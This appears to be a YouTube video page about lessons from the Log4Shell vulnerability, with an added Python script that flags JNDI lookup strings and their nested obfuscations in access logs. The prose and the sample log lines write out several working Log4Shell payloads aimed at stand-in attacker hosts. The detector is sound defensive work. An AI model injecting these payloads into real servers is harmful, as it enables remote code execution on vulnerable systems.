The wrong lessons to learn from the Log4j vulnerability

Sleuth TV

2 years ago

108,993 views

Log4j and Java suck, but I don't use them, so I'm safe... right? Wrong. This video walks through the wrong lessons to take away from the huge Log4j remote code execution vulnerability, known as Log4Shell (CVE-2021-44228), and points you at the lessons you should be learning instead. Even if the Log4j vulnerability does not affect you directly, vulnerabilities of its type certainly do.

CHAPTERS
00:00 Hook
00:10 Intro
00:35 Log4j vulnerability explained
01:58 1. It's Java's fault
02:51 2. Avoid popular libraries
04:05 3. Avoid 'enterprise' libraries
05:02 4. Backwards compatibility is bad
06:36 5. Write your own common libraries
08:18 Lessons to learn
08:31 1. Sanitize user inputs
09:09 2. Use popular libraries
09:29 3. Keep your libraries up to date
10:19 Outro
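
The "Log4j vulnerability explained" and "Sanitize user inputs" chapters turn on one detail: Log4Shell was triggered by a lookup string such as `${jndi:ldap://attacker-host/x}` landing in a logged value, and attackers quickly obfuscated it with nested lookups (`${lower:j}`, `${::-j}`) to slip past naive greps. The script below is an added example, not code from the video or from the Log4j project: it normalizes the common nesting tricks and flags JNDI lookups in log lines. The sample log lines, the `203.0.113.7` host and the function names are constructed for this illustration. Detection like this is a compensating control for your SOC; the actual fix is the video's lesson 3, upgrading the library.

```python
"""Flag Log4Shell-style JNDI lookup strings in log lines, including the
nested-lookup obfuscations attackers used to dodge a plain '${jndi:' grep.
Added example; the sample log lines below are constructed, not real traffic."""
import re
from typing import Dict, List

# Innermost ${...} expression: no '$', '{' or '}' inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with a URL-style scheme, e.g. ${jndi:ldap://host:1389/x}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)://([^/}\s:]+)", re.I)

# Constructed access-log lines (assumption: Apache combined format).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7/c}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]


def _reduce_once(m: "re.Match") -> str:
    """Resolve one innermost lookup the way the attacker relies on it resolving:
    ${lower:X} -> x, ${upper:X} -> X, ${anything:-X} -> X (default-value syntax,
    so ${::-j} becomes 'j'). Any other lookup is left untouched."""
    body = m.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return m.group(0)


def normalize_lookups(text: str, max_depth: int = 16) -> str:
    """Peel nested lookups inside-out until nothing changes or depth is exhausted."""
    for _ in range(max_depth):
        reduced = _INNER.sub(_reduce_once, text)
        if reduced == text:
            break
        text = reduced
    return text


def scan_log(lines) -> List[Dict]:
    """Return one finding per line that contains a JNDI lookup after normalization."""
    findings = []
    for n, raw in enumerate(lines, 1):
        norm = normalize_lookups(raw)
        m = _JNDI.search(norm)
        if m:
            findings.append({
                "line": n,
                "scheme": m.group(1).lower(),
                "host": m.group(2),
                "normalized": norm,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOGS):
        print(f"line {f['line']}: jndi via {f['scheme']} -> {f['host']}")
        print("   normalized:", f["normalized"])
```

The `${date:yyyy}` line is deliberately left unflagged: ordinary lookups in user input are noise, it is the `jndi:` prefix with a remote scheme that mattered for Log4Shell. The normalization only models the obfuscations attackers actually used (`lower`, `upper`, the `:-` default), so treat it as a starting point for a detection rule, not a complete emulation of Log4j's lookup engine.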

LINKS
Log4j - https://logging.apache.org/log4j/2.x/
Log4j disclosure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

SLEUTH
A deploy-based DORA / Accelerate Metrics tracker both managers and developers love.
Website - https://sleuth.io
Live Demo - https://app.sleuth.io/sleuth/sleuth/metrics/lead_time

Follow us on:
LinkedIn - https://www.linkedin.com/company/sleuth-io
Twitter - https://twitter.com/sleuth_io
Facebook - https://www.facebook.com/SleuthHQ
Twitch (Don streams MTTh, 3 PM MST) - https://twitch.com/mrdonbrown

Tags:

#log4j_vulnerability #log4j_exploit #log4j_vulnerability_explained #log4j #log4j_lessons #log_shell_vulnerability #logshell #logshell_vulnerability #log4shell_explained #log4j_vulnerability_2021 #log4shell_vulnerability